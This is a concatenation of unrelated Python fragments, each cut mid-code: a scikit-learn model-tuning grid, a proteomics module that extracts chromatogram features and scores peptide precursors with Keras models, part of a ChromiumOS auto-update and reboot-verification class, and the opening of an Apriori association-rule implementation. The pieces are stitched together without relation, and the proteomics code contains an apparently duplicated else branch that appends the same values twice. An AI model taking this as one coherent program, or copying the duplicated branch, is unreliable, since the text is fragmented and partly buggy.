if self.Ridge == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [Ridge(random_state = self.random_state)],
'estimator__alpha': np.arange(0.001, 1.01, 0.05),
})
# ElasticNet (L1+L2)
if self.ElasticNet == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean', 'median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [ElasticNet(random_state = self.random_state)],
'estimator__alpha': np.arange(0.001, 1.01, 0.05),
'estimator__l1_ratio': np.arange(0.0, 1.01, 0.2),
})
# SVR
if self.SVR == True:
optimization_grid.append({
'preprocessor__numerical__scaler': [RobustScaler(), StandardScaler(), MinMaxScaler()],
'preprocessor__numerical__cleaner__strategy': ['mean','median'],
'feature_selector__k': list(np.arange(1, total_features, 5)) + ['all'],
'estimator': [SVR()],
'estimator__C': np.concatenate([np.arange(0.1, 1.1, 0.1),
np.arange(10, 101, 10)]),
| |
<gh_stars>1-10
import os
import os.path
import pickle
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
from keras.models import load_model
from scipy.stats import pearsonr
import tools_cython as tools
from utils import *
from mz_calculator import calc_all_fragment_mzs
class Lib_frag:
def __init__(self, mz, charge, fragtype, series, intensity):
self.__mz = mz
self.__charge = charge
self.__fragtype = fragtype
self.__series = series
self.__intensity = intensity
def get_mz(self):
return self.__mz
def get_charge(self):
return self.__charge
def get_intensity(self):
return self.__intensity
def format_output(self):
return "{0}_{1}_{2}_{3}_{4}".format(self.__fragtype, self.__series, self.__charge, self.__mz, self.__intensity)
class Precursor:
def __init__(self, precursor_id, full_sequence, sequence, charge, precursor_mz, iRT, protein_name, decoy,
mz_min, mz_max, iso_range,
frag_mz_list, frag_charge_list, frag_type_list, frag_series_list, frag_intensity_list):
self.precursor_id = precursor_id
self.full_sequence = full_sequence
self.sequence = sequence
self.charge = charge
self.precursor_mz = precursor_mz
self.iRT = iRT
self.RT = None
self.protein_name = protein_name
self.decoy = decoy
self.precursor_win_id = None
self.ms1_areas = []
self.ms2_areas = []
# add
self.self_areas = []
self.self_pearsons = []
# add done
self.lib_frags_real_intensities = []
self.lib_pearsons = []
self.self_frags, self.self_frag_charges = np.array(calc_all_fragment_mzs(self.full_sequence,
self.charge,
(mz_min, mz_max),
return_charges = True))
iso_shift_max = int(min(iso_range, (mz_max - self.precursor_mz) * self.charge)) + 1
self.qt3_frags = [self.precursor_mz + iso_shift / self.charge for iso_shift in range(iso_shift_max)]
self.lib_frags = [Lib_frag(mz, charge, fragtype, series, inten) for mz, charge, fragtype, series, inten in zip(frag_mz_list, frag_charge_list, frag_type_list, frag_series_list, frag_intensity_list)]
self.iso_frags = self.filter_frags([i.get_mz() + 1 / i.get_charge() for i in self.lib_frags], mz_min, mz_max, padding = True)
self.light_frags = self.filter_frags([i.get_mz() - 1 / i.get_charge() for i in self.lib_frags], mz_min, mz_max, padding = True)
def filter_frags(self, frag_list, mz_min, mz_max, padding = False, padding_value = -1):
if padding:
return list(map(lambda x : x if (mz_min <= x < mz_max) else padding_value, frag_list))
return [i for i in frag_list if mz_min <= i < mz_max]
def set_RT(self, rt_norm_model, rt_model_params):
if rt_norm_model == "linear":
self.RT = self.iRT * rt_model_params[0] + rt_model_params[1]
else:
self.RT = np.poly1d(rt_model_params)(self.iRT)
def clear(self):
self.ms1_areas = []
self.ms2_areas = []
self.lib_frags_real_intensities = []
def __eq__(self, obj):
return (self.full_sequence == obj.full_sequence) and (self.charge == obj.charge)
def __str__(self):
return self.full_sequence + "_" + str(self.charge)
def __repr__(self):
return self.full_sequence + "_" + str(self.charge)
def load_precursors(library, lib_cols, precursor_index, precursor_list, mz_min, mz_max, iso_range):
for idx in precursor_index:
library_part = library.iloc[idx, :]
precursor_obj = Precursor(list(library_part.loc[:, lib_cols["PRECURSOR_ID_COL"]])[0],
list(library_part.loc[:, lib_cols["FULL_SEQUENCE_COL"]])[0],
list(library_part.loc[:, lib_cols["PURE_SEQUENCE_COL"]])[0],
list(library_part.loc[:, lib_cols["PRECURSOR_CHARGE_COL"]])[0],
list(library_part.loc[:, lib_cols["PRECURSOR_MZ_COL"]])[0],
list(library_part.loc[:, lib_cols["IRT_COL"]])[0],
list(library_part.loc[:, lib_cols["PROTEIN_NAME_COL"]])[0],
list(library_part.loc[:, lib_cols["DECOY_OR_NOT_COL"]])[0],
mz_min, mz_max, iso_range,
list(library_part[lib_cols["FRAGMENT_MZ_COL"]]),
list(library_part[lib_cols["FRAGMENT_CHARGE_COL"]]),
list(library_part[lib_cols["FRAGMENT_TYPE_COL"]]),
list(library_part[lib_cols["FRAGMENT_SERIES_COL"]]),
list(library_part[lib_cols["LIB_INTENSITY_COL"]]))
precursor_list.append(precursor_obj)
def extract_precursors(ms1, ms2, win_range, precursor_list, matrix_queue,
n_cycles, model_cycles, mz_unit, mz_min, mz_max, mz_tol_ms1, mz_tol_ms2, iso_range,
n_lib_frags, n_self_frags, n_qt3_frags, n_ms1_frags, n_iso_frags, n_light_frags,
peak_index_range, rt_norm_model, rt_model_params, p_id):
# add
n_self_quant_frags = 3
# add done
peak_indice = get_peak_indice(model_cycles, peak_index_range)
feature_dimension = n_lib_frags * 3 + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags
for idx, precursor in enumerate(precursor_list):
precursor.set_RT(rt_norm_model, rt_model_params)
precursor.precursor_win_id = calc_win_id(precursor.precursor_mz, win_range)
rt_pos_ms1 = find_rt_pos(precursor.RT, ms1.rt_list, n_cycles)
rt_pos_ms2 = find_rt_pos(precursor.RT, ms2[precursor.precursor_win_id].rt_list, n_cycles)
precursor_rt_list = [ms1.rt_list[i] for i in rt_pos_ms1]
precursor_ms1_spectra = [ms1.spectra[i] for i in rt_pos_ms1]
precursor_ms2_spectra = [ms2[precursor.precursor_win_id].spectra[i] for i in rt_pos_ms2]
lib_frags = [frag.get_mz() for frag in precursor.lib_frags]
all_lib_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in lib_frags])
all_lib_xics_1 = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, 0.2 * mz_tol_ms2) for frag in lib_frags])
all_lib_xics_2 = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, 0.45 * mz_tol_ms2) for frag in lib_frags])
all_iso_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.iso_frags])
all_light_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.light_frags])
all_self_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.self_frags])
all_qt3_xics = np.array([calc_XIC(precursor_ms2_spectra, frag, mz_unit, mz_tol_ms2) for frag in precursor.qt3_frags])
all_ms1_xics = [calc_XIC(precursor_ms1_spectra, precursor.precursor_mz, mz_unit, mz_tol_ms1),
calc_XIC(precursor_ms1_spectra, precursor.precursor_mz, mz_unit, 0.2 * mz_tol_ms1),
calc_XIC(precursor_ms1_spectra, precursor.precursor_mz, mz_unit, 0.45 * mz_tol_ms1)]
ms1_iso_frags = [precursor.precursor_mz - 1 / precursor.charge] + [precursor.precursor_mz + iso_shift / precursor.charge for iso_shift in range(1, iso_range + 1)]
ms1_iso_frags = [i for i in ms1_iso_frags if mz_min <= i < mz_max]
all_ms1_xics.extend([calc_XIC(precursor_ms1_spectra, frag, mz_unit, mz_tol_ms1) for frag in ms1_iso_frags])
all_ms1_xics = np.array(all_ms1_xics)
orig_matrices, matrices, middle_rts, rt_lists = [], [], [], []
for rt_start in range(n_cycles - model_cycles + 1):
rt_end = rt_start + model_cycles
precursor_rt_list_part = precursor_rt_list[rt_start : rt_end]
middle_rts.append(precursor_rt_list_part[model_cycles // 2])
rt_lists.append(precursor_rt_list_part)
lib_xics = all_lib_xics[:, rt_start : rt_end]
lib_xics_1 = all_lib_xics_1[:, rt_start : rt_end]
lib_xics_2 = all_lib_xics_2[:, rt_start : rt_end]
self_xics = all_self_xics[:, rt_start : rt_end]
qt3_xics = all_qt3_xics[:, rt_start : rt_end]
ms1_xics = all_ms1_xics[:, rt_start : rt_end]
iso_xics = all_iso_xics[:, rt_start : rt_end]
light_xics = all_light_xics[:, rt_start : rt_end]
self_xics = filter_matrix(self_xics)
qt3_xics = filter_matrix(qt3_xics)
lib_xics = tools.smooth_array(lib_xics.astype(float))
lib_xics_1 = tools.smooth_array(lib_xics_1.astype(float))
lib_xics_2 = tools.smooth_array(lib_xics_2.astype(float))
self_xics = tools.smooth_array(self_xics.astype(float))
qt3_xics = tools.smooth_array(qt3_xics.astype(float))
ms1_xics = tools.smooth_array(ms1_xics.astype(float))
iso_xics = tools.smooth_array(iso_xics.astype(float))
light_xics = tools.smooth_array(light_xics.astype(float))
precursor_rt_list_part_diff = np.array(precursor_rt_list_part[1:]) - np.array(precursor_rt_list_part[:-1])
ms2_areas = [tools.calc_area(lib_xics[i, :], precursor_rt_list_part_diff) for i in range(lib_xics.shape[0])]
ms1_area = tools.calc_area(ms1_xics[0, :], precursor_rt_list_part_diff)
precursor.ms2_areas.append("|".join([str(each) for each in ms2_areas]))
precursor.ms1_areas.append(str(ms1_area))
peak_intensities = lib_xics[:, peak_indice].mean(axis = 1)
precursor.lib_frags_real_intensities.append(peak_intensities)
std_indice, pearson_sums = calc_pearson_sums(lib_xics)
precursor.lib_pearsons.append(pearson_sums)
if lib_xics.shape[0] > 0:
std_indice, pearson_sums = calc_pearson_sums(lib_xics)
sort_order = np.argsort(-np.array(pearson_sums))
lib_xics = lib_xics[sort_order, :]
lib_xics_1 = lib_xics_1[sort_order, :]
lib_xics_2 = lib_xics_2[sort_order, :]
iso_xics = iso_xics[sort_order, :]
light_xics = light_xics[sort_order, :]
if self_xics.shape[0] > 1 and len(std_indice) >= 1:
self_pearson = np.array([tools.calc_pearson(self_xics[i, :], lib_xics[0, :]) for i in range(self_xics.shape[0])])
self_xics = self_xics[np.argsort(-self_pearson), :]
# add
self_areas = pad_list_with_zeros([tools.calc_area(self_xics[i, :], precursor_rt_list_part_diff) for i in range(self_xics.shape[0])], n_self_quant_frags)
self_pearsons = pad_list_with_zeros(list(self_pearson), n_self_quant_frags)
precursor.self_areas.append("|".join([str(each) for each in self_areas]))
precursor.self_pearsons.append("|".join([str(each) for each in self_pearsons]))
# add done
# add
else:
precursor.self_areas.append("|".join(["0"] * n_self_quant_frags))
precursor.self_pearsons.append("|".join(["0"] * n_self_quant_frags))
# add done
if qt3_xics.shape[0] > 1 and len(std_indice) >= 1:
qt3_pearson = np.array([tools.calc_pearson(qt3_xics[i, :], lib_xics[0, :]) for i in range(qt3_xics.shape[0])])
qt3_xics = qt3_xics[np.argsort(-qt3_pearson), :]
# add
else:
precursor.self_areas.append("|".join(["0"] * n_self_quant_frags))
precursor.self_pearsons.append("|".join(["0"] * n_self_quant_frags))
lib_matrix = adjust_size(lib_xics, n_lib_frags)
lib_matrix_1 = adjust_size(lib_xics_1, n_lib_frags)
lib_matrix_2 = adjust_size(lib_xics_2, n_lib_frags)
self_matrix = adjust_size(self_xics, n_self_frags)
qt3_matrix = adjust_size(qt3_xics, n_qt3_frags)
ms1_matrix = adjust_size(ms1_xics, n_ms1_frags)
iso_matrix = adjust_size(iso_xics, n_iso_frags)
light_matrix = adjust_size(light_xics, n_light_frags)
training_matrix = np.zeros((feature_dimension, model_cycles))
if lib_matrix.shape[1] != model_cycles:
lib_matrix = adjust_cycle(lib_matrix, model_cycles)
if self_matrix.shape[1] != model_cycles:
self_matrix = adjust_cycle(self_matrix, model_cycles)
if qt3_matrix.shape[1] != model_cycles:
qt3_matrix = adjust_cycle(qt3_matrix, model_cycles)
if ms1_matrix.shape[1] != model_cycles:
ms1_matrix = adjust_cycle(ms1_matrix, model_cycles)
if iso_matrix.shape[1] != model_cycles:
iso_matrix = adjust_cycle(iso_matrix, model_cycles)
if light_matrix.shape[1] != model_cycles:
light_matrix = adjust_cycle(light_matrix, model_cycles)
if lib_matrix_1.shape[1] != model_cycles:
lib_matrix_1 = adjust_cycle(lib_matrix_1, model_cycles)
if lib_matrix_2.shape[1] != model_cycles:
lib_matrix_2 = adjust_cycle(lib_matrix_2, model_cycles)
part1_indice = (0,
lib_matrix.shape[0])
part2_indice = (n_lib_frags,
n_lib_frags + self_matrix.shape[0])
part3_indice = (n_lib_frags + n_self_frags,
n_lib_frags + n_self_frags + qt3_matrix.shape[0])
part4_indice = (n_lib_frags + n_self_frags + n_qt3_frags,
n_lib_frags + n_self_frags + n_qt3_frags + ms1_matrix.shape[0])
part5_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + iso_matrix.shape[0])
part6_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + light_matrix.shape[0])
part7_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags + lib_matrix_1.shape[0])
part8_indice = (n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags + n_lib_frags,
n_lib_frags + n_self_frags + n_qt3_frags + n_ms1_frags + n_iso_frags + n_light_frags + n_lib_frags + lib_matrix_2.shape[0])
training_matrix[part1_indice[0] : part1_indice[1], :] = lib_matrix
training_matrix[part2_indice[0] : part2_indice[1], :] = self_matrix
training_matrix[part3_indice[0] : part3_indice[1], :] = qt3_matrix
training_matrix[part4_indice[0] : part4_indice[1], :] = ms1_matrix
training_matrix[part5_indice[0] : part5_indice[1], :] = iso_matrix
training_matrix[part6_indice[0] : part6_indice[1], :] = light_matrix
training_matrix[part7_indice[0] : part7_indice[1], :] = lib_matrix_1
training_matrix[part8_indice[0] : part8_indice[1], :] = lib_matrix_2
training_matrix = training_matrix.T
orig_matrices.append(training_matrix)
training_matrix = MinMaxScaler().fit_transform(training_matrix)
matrices.append(training_matrix)
matrix_queue.put([precursor, orig_matrices, matrices, middle_rts, rt_lists])
matrix_queue.put(None)
def score_batch(matrix_queue, lib_cols, BM_model_file, RM_model_file, out_file, rawdata_file, top_k, n_threads, batch_size, n_total_precursors, logger, out_chrom, rt_norm_dir):
BM_model = load_model(BM_model_file, compile = False)
RM_model = load_model(RM_model_file, compile = False)
BM_model.call = tf.function(BM_model.call, experimental_relax_shapes = True)
RM_model.call = tf.function(RM_model.call, experimental_relax_shapes = True)
if out_chrom:
chrom_dir = os.path.join(rt_norm_dir, "chrom")
if not os.path.exists(chrom_dir):
os.mkdir(chrom_dir)
out_head_1 = "%s\tfilename\tRT\t%s\t%s\t" % (lib_cols["PRECURSOR_ID_COL"], lib_cols["PURE_SEQUENCE_COL"], lib_cols["FULL_SEQUENCE_COL"])
out_head_2 = "%s\t%s\t%s\t%s\tassay_rt\tdelta_rt\t" % (lib_cols["PRECURSOR_CHARGE_COL"], lib_cols["PRECURSOR_MZ_COL"], lib_cols["PROTEIN_NAME_COL"], lib_cols["DECOY_OR_NOT_COL"])
out_head_3 = "%s\tnr_peaks\treal_intensities\tlib_cos_scores\t" % lib_cols["IRT_COL"]
out_head_4 = "dream_scores\tms1_area\tms2_areas\tself_areas\tself_pearsons\taggr_Fragment_Annotation\tlib_pearsons\tdrf_scores\n"
| |
the rootfs partition of the device."""
logging.info('Updating rootfs partition')
devserver_bin = os.path.join(self.device_dev_dir,
self.REMOTE_DEVSERVER_FILENAME)
ds = ds_wrapper.RemoteDevServerWrapper(
self.device, devserver_bin, self.is_au_endtoendtest,
static_dir=self.device_static_dir,
log_dir=self.device.work_dir)
try:
ds.Start()
logging.debug('Successfully started devserver on the device on port '
'%d.', ds.port)
# Use the localhost IP address to ensure that update engine
# client can connect to the devserver.
omaha_url = ds.GetDevServerURL(
ip='127.0.0.1', port=ds.port, sub_dir='update/pregenerated')
cmd = [self.REMOTE_UPDATE_ENGINE_BIN_FILENAME, '-check_for_update',
'-omaha_url=%s' % omaha_url]
self._StartPerformanceMonitoringForAUTest()
self.device.RunCommand(cmd, **self._cmd_kwargs)
# If we are using a progress bar, update it every 0.5s instead of 10s.
if command.UseProgressBar():
update_check_interval = self.UPDATE_CHECK_INTERVAL_PROGRESSBAR
oper = operation.ProgressBarOperation()
else:
update_check_interval = self.UPDATE_CHECK_INTERVAL_NORMAL
oper = None
end_message_not_printed = True
# Loop until update is complete.
while True:
#TODO(dhaddock): Remove retry when M61 is stable. See crbug.com/744212.
op, progress = retry_util.RetryException(cros_build_lib.RunCommandError,
UPDATE_ENGINE_STATUS_RETRY,
self.GetUpdateStatus,
self.device,
['CURRENT_OP', 'PROGRESS'],
delay_sec=DELAY_SEC_FOR_RETRY)
logging.info('Waiting for update...status: %s at progress %s',
op, progress)
if op == UPDATE_STATUS_UPDATED_NEED_REBOOT:
logging.notice('Update completed.')
break
if op == UPDATE_STATUS_IDLE:
raise RootfsUpdateError(
'Update failed with unexpected update status: %s' % op)
if oper is not None:
if op == UPDATE_STATUS_DOWNLOADING:
oper.ProgressBar(float(progress))
elif end_message_not_printed and op == UPDATE_STATUS_FINALIZING:
oper.Cleanup()
logging.notice('Finalizing image.')
end_message_not_printed = False
time.sleep(update_check_interval)
# Write the hostlog to a file before shutting off devserver.
self._CollectDevServerHostLog(ds)
ds.Stop()
except Exception as e:
logging.error('Rootfs update failed.')
self.RevertBootPartition()
logging.warning(ds.TailLog() or 'No devserver log is available.')
error_msg = 'Failed to perform rootfs update: %r'
raise RootfsUpdateError(error_msg % e)
finally:
if ds.is_alive():
self._CollectDevServerHostLog(ds)
ds.Stop()
self.device.CopyFromDevice(
ds.log_file,
os.path.join(self.tempdir, self.LOCAL_DEVSERVER_LOG_FILENAME),
**self._cmd_kwargs_omit_error)
self.device.CopyFromDevice(
self.REMOTE_UPDATE_ENGINE_LOGFILE_PATH,
os.path.join(self.tempdir, os.path.basename(
self.REMOTE_UPDATE_ENGINE_LOGFILE_PATH)),
follow_symlinks=True,
**self._cmd_kwargs_omit_error)
self.device.CopyFromDevice(
self.REMOTE_QUICK_PROVISION_LOGFILE_PATH,
os.path.join(self.tempdir, os.path.basename(
self.REMOTE_QUICK_PROVISION_LOGFILE_PATH)),
follow_symlinks=True,
ignore_failures=True,
**self._cmd_kwargs_omit_error)
self._CopyHostLogFromDevice('rootfs')
self._StopPerformanceMonitoringForAUTest()
def UpdateStateful(self, use_original_build=False):
"""Update the stateful partition of the device.
Args:
use_original_build: True if we use stateful.tgz of original build for
stateful update, otherwise, as default, False.
"""
msg = 'Updating stateful partition'
if self.original_payload_dir and use_original_build:
payload_dir = self.device_restore_dir
else:
payload_dir = self.device.work_dir
cmd = ['sh',
self.stateful_update_bin,
os.path.join(payload_dir, ds_wrapper.STATEFUL_FILENAME)]
if self._clobber_stateful:
cmd.append('--stateful_change=clean')
msg += ' with clobber enabled'
logging.info('%s...', msg)
try:
self.device.RunCommand(cmd, **self._cmd_kwargs)
except cros_build_lib.RunCommandError as e:
logging.error('Stateful update failed.')
self.ResetStatefulPartition()
error_msg = 'Failed to perform stateful partition update: %s'
raise StatefulUpdateError(error_msg % e)
def RunUpdateRootfs(self):
"""Run all processes needed by updating rootfs.
1. Check device's status to make sure it can be updated.
2. Copy files to remote device needed for rootfs update.
3. Do root updating.
TODO(ihf): Change this to:
2. Unpack rootfs here on server.
3. rsync from server rootfs to device rootfs to perform update
(do not use --compress).
"""
self.SetupRootfsUpdate()
# Copy payload for rootfs update.
self.TransferRootfsUpdate()
self.UpdateRootfs()
def RunUpdateStateful(self):
"""Run all processes needed by updating stateful.
1. Copy files to remote device needed by stateful update.
2. Do stateful update.
TODO(ihf): Change this to:
1. Unpack stateful here on server.
2. rsync from server stateful to device stateful to update (do not
use --compress).
"""
self.TransferStatefulUpdate()
self.UpdateStateful()
def RebootAndVerify(self):
"""Reboot and verify the remote device.
1. Reboot the remote device. If _clobber_stateful (--clobber-stateful)
is executed, the stateful partition is wiped, and the working directory
on the remote device no longer exists. So, recreate the working directory
for this remote device.
2. Verify the remote device, by checking that whether the root device
changed after reboot.
"""
logging.notice('rebooting device...')
# Record the current root device. This must be done after SetupRootfsUpdate
# and before reboot, since SetupRootfsUpdate may reboot the device if there
# is a pending update, which changes the root device, and reboot will
# definitely change the root device if update successfully finishes.
old_root_dev = self.GetRootDev(self.device)
self.device.Reboot()
if self._clobber_stateful:
self.device.BaseRunCommand(['mkdir', '-p', self.device.work_dir])
if self._do_rootfs_update:
logging.notice('Verifying that the device has been updated...')
new_root_dev = self.GetRootDev(self.device)
if old_root_dev is None:
raise AutoUpdateVerifyError(
'Failed to locate root device before update.')
if new_root_dev is None:
raise AutoUpdateVerifyError(
'Failed to locate root device after update.')
if new_root_dev == old_root_dev:
raise AutoUpdateVerifyError(
'Failed to boot into the new version. Possibly there was a '
'signing problem, or an automated rollback occurred because '
'your new image failed to boot.')
def RunUpdate(self):
"""Update the device with image of specific version."""
self.TransferDevServerPackage()
restore_stateful = self.CheckRestoreStateful()
if restore_stateful:
self.RestoreStateful()
# Perform device updates.
if self._do_rootfs_update:
self.RunUpdateRootfs()
logging.info('Rootfs update completed.')
if self._do_stateful_update and not restore_stateful:
self.RunUpdateStateful()
logging.info('Stateful update completed.')
if self._reboot:
self.RebootAndVerify()
if self._disable_verification:
logging.info('Disabling rootfs verification on the device...')
self.device.DisableRootfsVerification()
def _CollectDevServerHostLog(self, devserver):
"""Write the host_log events from the remote DUTs devserver to a file.
The hostlog is needed for analysis by autoupdate_EndToEndTest only.
We retry several times as some DUTs are slow immediately after
starting up a devserver and return no hostlog on the first call(s).
Args:
devserver: The remote devserver wrapper for the running devserver.
"""
if not self.is_au_endtoendtest:
return
for _ in range(0, MAX_RETRY):
try:
host_log_url = devserver.GetDevServerHostLogURL(ip='127.0.0.1',
port=devserver.port,
host='127.0.0.1')
# Save the hostlog.
self.device.RunCommand(['curl', host_log_url, '-o',
self.REMOTE_HOSTLOG_FILE_PATH],
**self._cmd_kwargs)
# Copy it back.
tmphostlog = os.path.join(self.tempdir, 'hostlog')
self.device.CopyFromDevice(self.REMOTE_HOSTLOG_FILE_PATH, tmphostlog,
**self._cmd_kwargs_omit_error)
# Check that it is not empty.
with open(tmphostlog, 'r') as out_log:
hostlog_data = json.loads(out_log.read())
if not hostlog_data:
logging.info('Hostlog empty. Trying again...')
time.sleep(DELAY_SEC_FOR_RETRY)
else:
break
except cros_build_lib.RunCommandError as e:
logging.debug('Exception raised while trying to write the hostlog: '
'%s', e)
def _StartPerformanceMonitoringForAUTest(self):
"""Start update_engine performance monitoring script in rootfs update.
This script is used by autoupdate_EndToEndTest.
"""
if self._clobber_stateful or not self.is_au_endtoendtest:
return None
cmd = ['python', self.REMOTE_UPDATE_ENGINE_PERF_SCRIPT_PATH, '--start-bg']
try:
perf_id = self.device.RunCommand(cmd).output.strip()
logging.info('update_engine_performance_monitors pid is %s.', perf_id)
self.perf_id = perf_id
except cros_build_lib.RunCommandError as e:
logging.debug('Could not start performance monitoring script: %s', e)
def _StopPerformanceMonitoringForAUTest(self):
"""Stop the performance monitoring script and save results to file."""
if self.perf_id is None:
return
cmd = ['python', self.REMOTE_UPDATE_ENGINE_PERF_SCRIPT_PATH, '--stop-bg',
self.perf_id]
try:
perf_json_data = self.device.RunCommand(cmd).output.strip()
self.device.RunCommand(['echo', json.dumps(perf_json_data), '>',
self.REMOTE_UPDATE_ENGINE_PERF_RESULTS_PATH])
except cros_build_lib.RunCommandError as e:
logging.debug('Could not stop performance monitoring process: %s', e)
def _CopyHostLogFromDevice(self, partial_filename):
"""Copy the hostlog file generated by the devserver from the device."""
if self.is_au_endtoendtest:
self.device.CopyFromDevice(
self.REMOTE_HOSTLOG_FILE_PATH,
os.path.join(self.tempdir, '_'.join([os.path.basename(
self.REMOTE_HOSTLOG_FILE_PATH), partial_filename])),
**self._cmd_kwargs_omit_error)
def _Reboot(self, error_stage):
try:
self.device.Reboot(timeout_sec=self.REBOOT_TIMEOUT)
except cros_build_lib.DieSystemExit:
raise ChromiumOSUpdateError('%s cannot recover from reboot at %s' % (
self.device.hostname, error_stage))
except remote_access.SSHConnectionError:
raise ChromiumOSUpdateError('Failed to connect to %s at %s' % (
self.device.hostname, error_stage))
class ChromiumOSUpdater(ChromiumOSFlashUpdater):
"""Used to auto-update Cros DUT with image.
Different from ChromiumOSFlashUpdater, which only contains cros-flash
related auto-update methods, ChromiumOSUpdater includes pre-setup and
post-check methods for both rootfs and stateful update. It also contains
various single check functions, like CheckVersion() and _ResetUpdateEngine().
Furthermore, this class adds retry to package transfer-related functions.
"""
REMOTE_STATEFUL_PATH_TO_CHECK = ['/var', '/home', '/mnt/stateful_partition']
REMOTE_STATEFUL_TEST_FILENAME = '.test_file_to_be_deleted'
REMOTE_UPDATED_MARKERFILE_PATH = '/run/update_engine_autoupdate_completed'
REMOTE_LAB_MACHINE_FILE_PATH = '/mnt/stateful_partition/.labmachine'
KERNEL_A = {'name': 'KERN-A', 'kernel': 2, 'root': 3}
KERNEL_B = {'name': 'KERN-B', 'kernel': 4, 'root': 5}
KERNEL_UPDATE_TIMEOUT = 180
def __init__(self, device, build_name, payload_dir, dev_dir='',
log_file=None, tempdir=None, original_payload_dir=None,
clobber_stateful=True, local_devserver=False, yes=False,
payload_filename=None):
"""Initialize a ChromiumOSUpdater for auto-update a chromium OS device.
Args:
device: the ChromiumOSDevice to be updated.
build_name: the target update version for the device.
payload_dir: the directory of payload(s).
dev_dir: the directory of the devserver that runs the CrOS auto-update.
log_file: The file to save running logs.
tempdir: the temp directory in caller, not in the device. For example,
the tempdir for cros flash is /tmp/cros-flash****/, used to
temporarily keep files when transferring devserver package, and
reserve devserver and update engine logs.
original_payload_dir: The directory containing payloads whose version is
the same as current host's rootfs partition. If it's None, will first
try installing the matched stateful.tgz with the host's rootfs
Partition when restoring stateful. Otherwise, install the target
stateful.tgz.
clobber_stateful: whether to do a clean stateful update. The default is
True for CrOS update.
local_devserver: Indicate whether users use their local devserver.
Default: False.
yes: Assume "yes" (True) for any prompt. The default is False. However,
it should be set as True if we want to disable all the prompts for
auto-update.
payload_filename: Filename of exact payload file to use for
update instead of the default: update.gz.
"""
super(ChromiumOSUpdater, self).__init__(
device, payload_dir, dev_dir=dev_dir, tempdir=tempdir,
original_payload_dir=original_payload_dir,
clobber_stateful=clobber_stateful, yes=yes,
payload_filename=payload_filename)
if log_file:
self._cmd_kwargs['log_stdout_to_file'] = log_file
self._cmd_kwargs['append_to_file'] = True
self._cmd_kwargs['combine_stdout_stderr'] = | |
"""Association mining -- apriori algo"""
__author__ = 'thor'
from numpy import *
# Modified from:
# <NAME> & <NAME> (https://github.com/cse40647/cse40647/blob/sp.14/10%20-%20Apriori.ipynb)
#
# Itself Modified from:
# <NAME> (https://gist.github.com/marcelcaraciolo/1423287)
#
# Functions to compute and extract association rules from a given frequent
# itemset generated by the Apriori algorithm.
import pandas as pd
from statsmodels.stats.proportion import samplesize_confint_proportion
def choose_sample_size(min_confidence, alpha=0.05, half_length=None):
if half_length is None:
t = 0.20 * min_confidence if min_confidence < 0.5 else 0.20 * (1 - min_confidence)
half_length = max(0.01, t) # choose half length to be a proportion (0.2) of min_confidence
return samplesize_confint_proportion(
proportion=min_confidence,
half_length=half_length,
alpha=alpha,
method='normal')
def association_rules(dataset, min_confidence=0.2, min_support=None, output='dataframe', verbose=False):
assert min_confidence > 0 and min_confidence <= 1, "min_confidence must be between 0 and 1"
if min_support is None:
# if no min_support is given, choose it to be the sample size you need to get 95% conf in proportion estimate
min_support = choose_sample_size(min_confidence, alpha=0.05, half_length=None)
if min_support > 1:
min_support /= float(len(dataset))
F, support_data = apriori(dataset, min_support=min_support, verbose=False)
H = generate_rules(F, support_data, min_confidence=min_confidence, verbose=verbose)
if output == 'triple':
return H
elif output == 'dataframe':
def set_to_string(s):
return str(", ".join(s))
support_df = pd.DataFrame({'condition': list(map(set_to_string, list(support_data.keys()))),
'condition_frequency': list(support_data.values())})
support_df['condition_count'] = len(dataset) * support_df['condition_frequency']
d = pd.DataFrame([{'condition': set_to_string(condition),
'effect': set_to_string(effect),
'effect_frequency': support}
for condition, effect, support in H])
d = pd.merge(d, support_df, how='inner', on='condition')
d['condition_and_effect_count'] = d['effect_frequency'] * d['condition_count']
d = d[['condition', 'effect', 'effect_frequency', 'condition_count', 'condition_and_effect_count',
'condition_frequency']]
return d.sort('effect_frequency', ascending=False).reset_index(drop=True)
def apriori(dataset, min_support=0.5, verbose=False):
"""Implements the Apriori algorithm.
The Apriori algorithm will iteratively generate new candidate
k-itemsets using the frequent (k-1)-itemsets found in the previous
iteration.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate
candidate itemsets.
min_support : float
The minimum support threshold. Defaults to 0.5.
Returns
-------
F : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
References
----------
.. [1] <NAME>, <NAME>, "Fast Algorithms for Mining Association
Rules", 1994.
"""
C1 = create_candidates(dataset)
D = list(map(set, dataset))
F1, support_data = support_prune(D, C1, min_support, verbose=False) # prune candidate 1-itemsets
F = [F1] # list of frequent itemsets; initialized to frequent 1-itemsets
k = 2 # the itemset cardinality
while (len(F[k - 2]) > 0):
